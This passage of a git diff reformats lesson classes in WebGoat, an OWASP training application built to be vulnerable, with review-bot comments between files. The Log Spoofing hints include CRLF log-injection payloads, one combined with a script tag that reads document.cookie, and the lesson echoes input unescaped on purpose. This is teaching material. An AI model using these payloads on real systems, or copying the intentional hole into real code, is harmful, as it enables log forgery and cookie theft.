s.getParser().getRawParameter("field7", - "301-604-4882"); - ec.addElement(new StringElement(script)); - TextArea input1 = new TextArea("field1", 1, 25).addElement(param1); - TextArea input2 = new TextArea("field2", 1, 25).addElement(param2); - TextArea input3 = new TextArea("field3", 1, 25).addElement(param3); - TextArea input4 = new TextArea("field4", 1, 25).addElement(param4); - TextArea input5 = new TextArea("field5", 1, 25).addElement(param5); - TextArea input6 = new TextArea("field6", 1, 25).addElement(param6); - TextArea input7 = new TextArea("field7", 1, 25).addElement(param7); - Input b = new Input(); - b.setType(Input.BUTTON); - b.setValue("Submit"); - b.addAttribute("onclick", "validate();"); - ec.addElement(new Div().addElement(new StringElement( - "Field1: exactly three lowercase 
characters (" + regex1 - + ")"))); - ec.addElement(new Div().addElement(input1)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement( - "Field2: exactly three digits (" + regex2 + ")"))); - ec.addElement(new Div().addElement(input2)); - ec.addElement(new P()); - ec.addElement(new Div() - .addElement(new StringElement( - "Field3: letters, numbers, and space only (" - + regex3 + ")"))); - ec.addElement(new Div().addElement(input3)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement( - "Field4: enumeration of numbers (" + regex4 + ")"))); - ec.addElement(new Div().addElement(input4)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement( - "Field5: simple zip code (" + regex5 + ")"))); - ec.addElement(new Div().addElement(input5)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement( - "Field6: zip with optional dash four (" + regex6 + ")"))); - ec.addElement(new Div().addElement(input6)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement( - "Field7: US phone number with or without dashes (" + regex7 - + ")"))); - ec.addElement(new Div().addElement(input7)); - ec.addElement(new P()); - ec.addElement(b); + ElementContainer ec = new ElementContainer(); - // Check the patterns on the server -- and note the errors in the response - // these should never match unless the client side pattern script doesn't work + // Regular expressions in Java and JavaScript compatible form - int err = 0; - String msg = ""; + // Note: if you want to use the regex=new RegExp(\"" + regex + "\");" syntax - if (!pattern1.matcher(param1).matches()) - { - err++; - msg += "
Server side validation violation: You succeeded for Field1."; - } + // you'll have to use \\\\d to indicate a digit for example -- one escaping for Java and one + // for JavaScript - if (!pattern2.matcher(param2).matches()) - { - err++; - msg += "
Server side validation violation: You succeeded for Field2."; - } + String regex1 = "^[a-z]{3}$";// any three lowercase letters + String regex2 = "^[0-9]{3}$";// any three digits + String regex3 = "^[a-zA-Z0-9 ]*$";// alphanumerics and space without punctuation + String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";// enumeration of + // numbers + String regex5 = "^\\d{5}$";// simple zip code + String regex6 = "^\\d{5}(-\\d{4})?$";// zip with optional dash-four + String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";// US phone number with or without dashes + Pattern pattern1 = Pattern.compile(regex1); + Pattern pattern2 = Pattern.compile(regex2); + Pattern pattern3 = Pattern.compile(regex3); + Pattern pattern4 = Pattern.compile(regex4); + Pattern pattern5 = Pattern.compile(regex5); + Pattern pattern6 = Pattern.compile(regex6); + Pattern pattern7 = Pattern.compile(regex7); + String lineSep = System.getProperty("line.separator"); + String script = "" + lineSep; + try + { + String param1 = s.getParser().getRawParameter("field1", "abc"); + String param2 = s.getParser().getRawParameter("field2", "123"); + String param3 = s.getParser().getRawParameter("field3", "abc 123 ABC"); + String param4 = s.getParser().getRawParameter("field4", "seven"); + String param5 = s.getParser().getRawParameter("field5", "90210"); + String param6 = s.getParser().getRawParameter("field6", "90210-1111"); + String param7 = s.getParser().getRawParameter("field7", "301-604-4882"); + ec.addElement(new StringElement(script)); + TextArea input1 = new TextArea("field1", 1, 25).addElement(param1); + TextArea input2 = new TextArea("field2", 1, 25).addElement(param2); + TextArea input3 = new TextArea("field3", 1, 25).addElement(param3); + TextArea input4 = new TextArea("field4", 1, 25).addElement(param4); + TextArea input5 = new TextArea("field5", 1, 25).addElement(param5); + TextArea input6 = new TextArea("field6", 1, 25).addElement(param6); + TextArea input7 = new TextArea("field7", 1, 
25).addElement(param7); - if (!pattern3.matcher(param3).matches()) - { - err++; - msg += "
Server side validation violation: You succeeded for Field3."; - } + Input b = new Input(); + b.setType(Input.BUTTON); + b.setValue("Submit"); + b.addAttribute("onclick", "validate();"); + ec.addElement(new Div().addElement(new StringElement("Field1: exactly three lowercase characters (" + + regex1 + ")"))); + ec.addElement(new Div().addElement(input1)); + ec.addElement(new P()); + ec.addElement(new Div().addElement(new StringElement("Field2: exactly three digits (" + regex2 + ")"))); + ec.addElement(new Div().addElement(input2)); + ec.addElement(new P()); + ec.addElement(new Div().addElement(new StringElement("Field3: letters, numbers, and space only (" + regex3 + + ")"))); + ec.addElement(new Div().addElement(input3)); + ec.addElement(new P()); + ec.addElement(new Div().addElement(new StringElement("Field4: enumeration of numbers (" + regex4 + ")"))); + ec.addElement(new Div().addElement(input4)); + ec.addElement(new P()); + ec.addElement(new Div().addElement(new StringElement("Field5: simple zip code (" + regex5 + ")"))); + ec.addElement(new Div().addElement(input5)); + ec.addElement(new P()); + ec.addElement(new Div() + .addElement(new StringElement("Field6: zip with optional dash four (" + regex6 + ")"))); + ec.addElement(new Div().addElement(input6)); + ec.addElement(new P()); + ec.addElement(new Div().addElement(new StringElement("Field7: US phone number with or without dashes (" + + regex7 + ")"))); + ec.addElement(new Div().addElement(input7)); + ec.addElement(new P()); + ec.addElement(b); - if (!pattern4.matcher(param4).matches()) - { - err++; - msg += "
Server side validation violation: You succeeded for Field4."; - } + // Check the patterns on the server -- and note the errors in the response + // these should never match unless the client side pattern script doesn't work - if (!pattern5.matcher(param5).matches()) - { - err++; - msg += "
Server side validation violation: You succeeded for Field5."; - } + int err = 0; + String msg = ""; - if (!pattern6.matcher(param6).matches()) - { - err++; - msg += "
Server side validation violation: You succeeded for Field6."; - } + if (!pattern1.matcher(param1).matches()) + { + err++; + msg += "
Server side validation violation: You succeeded for Field1."; + } - if (!pattern7.matcher(param7).matches()) - { - err++; - msg += "
Server side validation violation: You succeeded for Field7."; - } + if (!pattern2.matcher(param2).matches()) + { + err++; + msg += "
Server side validation violation: You succeeded for Field2."; + } - if (err > 0) - { - s.setMessage(msg); - } - if (err >= 7) - { - // This means they defeated all the client side checks - makeSuccess(s); - } + if (!pattern3.matcher(param3).matches()) + { + err++; + msg += "
Server side validation violation: You succeeded for Field3."; + } + + if (!pattern4.matcher(param4).matches()) + { + err++; + msg += "
Server side validation violation: You succeeded for Field4."; + } + + if (!pattern5.matcher(param5).matches()) + { + err++; + msg += "
Server side validation violation: You succeeded for Field5."; + } + + if (!pattern6.matcher(param6).matches()) + { + err++; + msg += "
Server side validation violation: You succeeded for Field6."; + } + + if (!pattern7.matcher(param7).matches()) + { + err++; + msg += "
Server side validation violation: You succeeded for Field7."; + } + + if (err > 0) + { + s.setMessage(msg); + } + if (err >= 7) + { + // This means they defeated all the client side checks + makeSuccess(s); + } + } + + catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + return (ec); } - catch (Exception e) + /** + * DOCUMENT ME! + * + * @return DOCUMENT ME! + */ + protected Category getDefaultCategory() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return Category.UNVALIDATED_PARAMETERS; } - return (ec); - } + /** + * Gets the hints attribute of the AccessControlScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("The validation is happening in your browser."); + hints.add("Try modifying the values with a proxy after they leave your browser"); + hints.add("Another way is to delete the JavaScript before you view the page."); - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! - */ - protected Category getDefaultCategory() - { - return Category.UNVALIDATED_PARAMETERS; - } + return hints; + } + /** + * Gets the instructions attribute of the WeakAccessControl object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = "This website performs both client and server side validation. " + + "For this exercise, your job is to break the client side validation and send the " + + " website input that it wasn't expecting." + + " You must break all 7 validators at the same time. 
"; + return (instructions); + } - /** - * Gets the hints attribute of the AccessControlScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); + private final static Integer DEFAULT_RANKING = new Integer(120); - hints.add("The validation is happening in your browser."); - hints - .add("Try modifying the values with a proxy after they leave your browser"); - hints - .add("Another way is to delete the JavaScript before you view the page."); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - return hints; - } + /** + * Gets the title attribute of the AccessControlScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Bypass Client Side JavaScript Validation"); + } - - /** - * Gets the instructions attribute of the WeakAccessControl object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = "This website performs both client and server side validation. " - + "For this exercise, your job is to break the client side validation and send the " - + " website input that it wasn't expecting." - + " You must break all 7 validators at the same time. "; - return (instructions); - } - - private final static Integer DEFAULT_RANKING = new Integer(120); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the AccessControlScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Bypass Client Side JavaScript Validation"); - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java index 47ef1765f..a1e14e1b4 100644 
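Review bot: The seven `Pattern.compile(regexN)` calls in the new `createContent` body recompile identical regexes on every request; since the patterns are constants, they belong in `private static final Pattern` fields, e.g. `private static final Pattern PATTERN1 = Pattern.compile("^[a-z]{3}$"); // any three lowercase letters`, with the `String regexN` locals kept only where the text is shown to the user (`PATTERN1.pattern()` can supply that). The seven identical `if (!patternN.matcher(paramN).matches()) { err++; msg += …FieldN.; }` blocks could then be a single loop over a `Pattern[]`/`String[]` pair, which would also make `err >= 7` derive from the array length rather than a literal. The `catch (Exception e)` at the end still routes the stack trace to `e.printStackTrace()`; a comment such as `// NOTE: stack trace goes to stdout, not the WebGoat log` or a logger call would make that visible. The whole of `createContent` is inside this hunk, as are `getHints`, `getInstructions` and `getTitle`.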
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java @@ -1,10 +1,10 @@ + package org.owasp.webgoat.lessons; import java.io.BufferedReader; import java.io.FileReader; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -18,274 +18,254 @@ import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce Mayhew WebGoat - * @created October 28, 2003 + * + * @author Bruce Mayhew WebGoat + * @created October 28, 2003 */ public abstract class LessonAdapter extends AbstractLesson { + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { + // Mark this lesson as completed. + makeSuccess(s); - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - // Mark this lesson as completed. - makeSuccess(s); + ElementContainer ec = new ElementContainer(); - ElementContainer ec = new ElementContainer(); - - ec - .addElement(new Center().addElement(new H3() - .addElement(new StringElement( + ec.addElement(new Center().addElement(new H3().addElement(new StringElement( "Detailed Lesson Creation Instructions.")))); - ec.addElement(new P()); - ec - .addElement(new StringElement( - "Lesson are simple to create and very little coding is required.   " - + "In fact, most lessons can be created by following the easy to use instructions in the " - + "WebGoat User Guide.  
" - + "If you would prefer, send your lesson ideas to " - + getWebgoatContext().getFeedbackAddress())); + ec.addElement(new P()); + ec + .addElement(new StringElement( + "Lesson are simple to create and very little coding is required.   " + + "In fact, most lessons can be created by following the easy to use instructions in the " + + "WebGoat User Guide.  " + + "If you would prefer, send your lesson ideas to " + + getWebgoatContext().getFeedbackAddress())); - String fileName = s.getContext().getRealPath( - "doc/New Lesson Instructions.txt"); - if (fileName != null) - { - try - { - PRE pre = new PRE(); - BufferedReader in = new BufferedReader(new FileReader(fileName)); - String line = null; - while ((line = in.readLine()) != null) + String fileName = s.getContext().getRealPath("doc/New Lesson Instructions.txt"); + if (fileName != null) { - pre.addElement(line + "\n"); + try + { + PRE pre = new PRE(); + BufferedReader in = new BufferedReader(new FileReader(fileName)); + String line = null; + while ((line = in.readLine()) != null) + { + pre.addElement(line + "\n"); + } + ec.addElement(pre); + } catch (Exception e) + { + e.printStackTrace(); + } } - ec.addElement(pre); - } - catch (Exception e) - { - e.printStackTrace(); - } + return (ec); } - return (ec); - } - - /** - * Gets the category attribute of the LessonAdapter object. 
The default category is "General" Only - * override this method if you wish to create a new category or if you wish this lesson to reside - * within a category other the "General" - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.GENERAL; - } - - - protected boolean getDefaultHidden() - { - return false; - } - - private final static Integer DEFAULT_RANKING = new Integer(1000); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the hintCount attribute of the LessonAdapter object - * - * @return The hintCount value - */ - public int getHintCount(WebSession s) - { - return getHints(s).size(); - } - - - /** - * Fill in a minor hint that will help people who basically get it, but are stuck on somthing - * silly. Hints will be returned to the user in the order they appear below. The user must click - * on the "next hint" button before the hint will be displayed. - * - * @return The hint1 value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("There are no hints defined."); - - return hints; - } - - - public String getHint(WebSession s, int hintNumber) - { - return (String) getHints(s).get(hintNumber); - } - - - /** - * Gets the credits attribute of the AbstractLesson object - * - * @return The credits value - */ - public Element getCredits() - { - return new StringElement(); - } - - - /** - * Gets the instructions attribute of the LessonAdapter object. Instructions will rendered as html - * and will appear below the control area and above the actual lesson area. Instructions should - * provide the user with the general setup and goal of the lesson. - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - StringBuffer buff = new StringBuffer(); - try + /** + * Gets the category attribute of the LessonAdapter object. 
The default category is "General" + * Only override this method if you wish to create a new category or if you wish this lesson to + * reside within a category other the "General" + * + * @return The category value + */ + protected Category getDefaultCategory() { - String fileName = s.getWebResource(getLessonPlanFileName()); - if (fileName != null) - { - BufferedReader in = new BufferedReader(new FileReader(fileName)); - String line = null; - boolean startAppending = false; - while ((line = in.readLine()) != null) - { - if (line.indexOf("") != -1) - { - startAppending = true; - continue; - } - if (line.indexOf("") != -1) - { - startAppending = false; - continue; - } - if (startAppending) - { - buff.append(line + "\n"); - } - } - } + return Category.GENERAL; } - catch (Exception e) - {} - return buff.toString(); + protected boolean getDefaultHidden() + { + return false; + } - } + private final static Integer DEFAULT_RANKING = new Integer(1000); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - /** - * Fill in a descriptive title for this lesson. The title of the lesson. This will appear above - * the control area at the top of the page. This field will be rendered as html. - * - * @return The title value - */ - public String getTitle() - { - return "Untitled Lesson " + getScreenId(); - } + /** + * Gets the hintCount attribute of the LessonAdapter object + * + * @return The hintCount value + */ + public int getHintCount(WebSession s) + { + return getHints(s).size(); + } + /** + * Fill in a minor hint that will help people who basically get it, but are stuck on somthing + * silly. Hints will be returned to the user in the order they appear below. The user must click + * on the "next hint" button before the hint will be displayed. 
+ * + * @return The hint1 value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("There are no hints defined."); - public String getCurrentAction(WebSession s) - { - return s.getLessonSession(this).getCurrentLessonScreen(); - } + return hints; + } + public String getHint(WebSession s, int hintNumber) + { + return (String) getHints(s).get(hintNumber); + } - public void setCurrentAction(WebSession s, String lessonScreen) - { - s.getLessonSession(this).setCurrentLessonScreen(lessonScreen); - } + /** + * Gets the credits attribute of the AbstractLesson object + * + * @return The credits value + */ + public Element getCredits() + { + return new StringElement(); + } + /** + * Gets the instructions attribute of the LessonAdapter object. Instructions will rendered as + * html and will appear below the control area and above the actual lesson area. Instructions + * should provide the user with the general setup and goal of the lesson. + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + StringBuffer buff = new StringBuffer(); + try + { + String fileName = s.getWebResource(getLessonPlanFileName()); + if (fileName != null) + { + BufferedReader in = new BufferedReader(new FileReader(fileName)); + String line = null; + boolean startAppending = false; + while ((line = in.readLine()) != null) + { + if (line.indexOf("") != -1) + { + startAppending = true; + continue; + } + if (line.indexOf("") != -1) + { + startAppending = false; + continue; + } + if (startAppending) + { + buff.append(line + "\n"); + } + } + } + } catch (Exception e) + { + } - public Object getSessionAttribute(WebSession s, String key) - { - return s.getRequest().getSession().getAttribute(key); - } + return buff.toString(); + } - public void setSessionAttribute(WebSession s, String key, Object value) - { - s.getRequest().getSession().setAttribute(key, value); - } + /** + * Fill in a descriptive title for this lesson. 
The title of the lesson. This will appear above + * the control area at the top of the page. This field will be rendered as html. + * + * @return The title value + */ + public String getTitle() + { + return "Untitled Lesson " + getScreenId(); + } + public String getCurrentAction(WebSession s) + { + return s.getLessonSession(this).getCurrentLessonScreen(); + } - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element makeSuccess(WebSession s) - { - getLessonTracker(s).setCompleted(true); + public void setCurrentAction(WebSession s, String lessonScreen) + { + s.getLessonSession(this).setCurrentLessonScreen(lessonScreen); + } - s - .setMessage("Congratulations. You have successfully completed this lesson."); + public Object getSessionAttribute(WebSession s, String key) + { + return s.getRequest().getSession().getAttribute(key); + } - return (null); - } + public void setSessionAttribute(WebSession s, String key, Object value) + { + s.getRequest().getSession().setAttribute(key, value); + } + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element makeSuccess(WebSession s) + { + getLessonTracker(s).setCompleted(true); - /** - * Gets the credits attribute of the AbstractLesson object - * - * @return The credits value - */ - protected Element getCustomCredits(String text, Element e) - { + s.setMessage("Congratulations. 
You have successfully completed this lesson."); + + return (null); + } + + /** + * Gets the credits attribute of the AbstractLesson object + * + * @return The credits value + */ + protected Element getCustomCredits(String text, Element e) + { Table t = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("RIGHT"); TR tr = new TR(); tr.addElement(new TD(text).setVAlign("MIDDLE").setAlign("RIGHT").setWidth("100%")); tr.addElement(new TD(e).setVAlign("MIDDLE").setAlign("RIGHT")); t.addElement(tr); return t; - } - + } + } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java b/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java index 13081b3af..2181706f8 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java @@ -1,10 +1,10 @@ + package org.owasp.webgoat.lessons; import java.io.UnsupportedEncodingException; import java.net.URLDecoder; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.HtmlColor; 
@@ -18,157 +18,145 @@ import org.apache.ecs.html.Table; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * - * @author Sherif Koussa Macadamian Technologies - * @created October 28, 2006 + * @author Sherif Koussa Macadamian Technologies + * @created October 28, 2006 */ public class LogSpoofing extends LessonAdapter { - private static final String USERNAME = "username"; + private static final String USERNAME = "username"; - private static final String PASSWORD = "password"; + private static final String PASSWORD = "password"; - private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt( - "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0); + private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies") + .setBorder(0).setHspace(0).setVspace(0); - protected Element createContent(WebSession s) - { - - ElementContainer ec = null; - String inputUsername = null; - try + protected Element createContent(WebSession s) { - Table t = new Table(0).setCellSpacing(0).setCellPadding(0) - .setBorder(0); - TR row1 = new TR(); - TR row2 = new TR(); - TR row3 = new TR(); + ElementContainer ec = null; + String inputUsername = null; + try + { - row1.addElement(new TD(new StringElement("Username: "))); - Input username = new Input(Input.TEXT, USERNAME, ""); - row1.addElement(new TD(username)); + Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0); + TR row1 = new TR(); + TR row2 = new TR(); + TR row3 = new TR(); - row2.addElement(new TD(new 
StringElement("Password: "))); - Input password = new Input(Input.PASSWORD, PASSWORD, ""); - row2.addElement(new TD(password)); + row1.addElement(new TD(new StringElement("Username: "))); + Input username = new Input(Input.TEXT, USERNAME, ""); + row1.addElement(new TD(username)); - Element b = ECSFactory.makeButton("Login"); - row3.addElement(new TD(new StringElement("  "))); - row3.addElement(new TD(b)).setAlign("right"); + row2.addElement(new TD(new StringElement("Password: "))); + Input password = new Input(Input.PASSWORD, PASSWORD, ""); + row2.addElement(new TD(password)); - t.addElement(row1); - t.addElement(row2); - t.addElement(row3); + Element b = ECSFactory.makeButton("Login"); + row3.addElement(new TD(new StringElement("  "))); + row3.addElement(new TD(b)).setAlign("right"); - ec = new ElementContainer(); - ec.addElement(t); + t.addElement(row1); + t.addElement(row2); + t.addElement(row3); - inputUsername = new String(s.getParser().getRawParameter(USERNAME, - "")); - if (inputUsername.length() != 0) - { - inputUsername = URLDecoder.decode(inputUsername, "UTF-8"); - } + ec = new ElementContainer(); + ec.addElement(t); - ec.addElement(new PRE(" ")); + inputUsername = new String(s.getParser().getRawParameter(USERNAME, "")); + if (inputUsername.length() != 0) + { + inputUsername = URLDecoder.decode(inputUsername, "UTF-8"); + } - Table t2 = new Table(0).setCellSpacing(0).setCellPadding(0) - .setBorder(0); - TR row4 = new TR(); - row4.addElement( - new TD(new PRE("Login failed for username: " - + inputUsername))).setBgColor(HtmlColor.GRAY); + ec.addElement(new PRE(" ")); - t2.addElement(row4); + Table t2 = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0); + TR row4 = new TR(); + row4.addElement(new TD(new PRE("Login failed for username: " + inputUsername))).setBgColor(HtmlColor.GRAY); - ec.addElement(t2); + t2.addElement(row4); - if (inputUsername.length() != 0 - && inputUsername.toUpperCase().indexOf( - System.getProperty("line.separator") - + 
"LOGIN SUCCEEDED FOR USERNAME:") >= 0) - { - makeSuccess(s); - } + ec.addElement(t2); + + if (inputUsername.length() != 0 + && inputUsername.toUpperCase().indexOf( + System.getProperty("line.separator") + + "LOGIN SUCCEEDED FOR USERNAME:") >= 0) + { + makeSuccess(s); + } + } catch (UnsupportedEncodingException e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + return ec; } - catch (UnsupportedEncodingException e) + + private final static Integer DEFAULT_RANKING = new Integer(72); + + protected Integer getDefaultRanking() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return DEFAULT_RANKING; } - return ec; - } - private final static Integer DEFAULT_RANKING = new Integer(72); + @Override + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("Try to fool the humane eye by using new lines."); + hints.add("Use CR (%0d) and LF (%0a) for a new line."); + hints.add("Try: Smith%0d%0aLogin Succeeded for username: admin"); + hints + .add("Try: Smith%0d%0aLogin Succeeded for username: admin<script>alert(document.cookie)</script>"); + return hints; + } - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + @Override + public String getTitle() + { + return "Log Spoofing"; + } + @Override + protected Category getDefaultCategory() + { + return Category.INJECTION; + } - @Override - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("Try to fool the humane eye by using new lines."); - hints.add("Use CR (%0d) and LF (%0a) for a new line."); - hints.add("Try: Smith%0d%0aLogin Succeeded for username: admin"); - hints - .add("Try: Smith%0d%0aLogin Succeeded for username: admin<script>alert(document.cookie)</script>"); - - return hints; - } - - - @Override - public String getTitle() - { - return "Log Spoofing"; - } - - - @Override - protected Category getDefaultCategory() - { - return Category.INJECTION; - 
} - - - public Element getCredits() - { - return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); - } + public Element getCredits() + { + return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java b/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java index 978148880..09d1c1d53 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java 
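Review bot: The success check in `createContent` keys on `System.getProperty("line.separator") + "LOGIN SUCCEEDED FOR USERNAME:"`, so whether a student's injected line break counts depends on the host OS rather than on the input: on Windows (`\r\n`) a payload using only `%0a`, which the hints present as a valid line feed, never matches, while on Unix any `\n` matches. Since the lesson is about CR/LF injection, the check should accept either separator explicitly, e.g. `String upper = inputUsername.toUpperCase();` then `if (upper.indexOf("\nLOGIN SUCCEEDED FOR USERNAME:") >= 0 || upper.indexOf("\rLOGIN SUCCEEDED FOR USERNAME:") >= 0)`. The unescaped echo of `inputUsername` into the `PRE` element is the intended vulnerability of this lesson (hint four relies on it), so that is not a finding here, but a one-line comment saying so would stop a future cleanup from "fixing" it. `createContent` is fully inside this hunk.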
@@ -1,90 +1,88 @@ + package org.owasp.webgoat.lessons; import org.apache.ecs.Element; import org.apache.ecs.StringElement; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
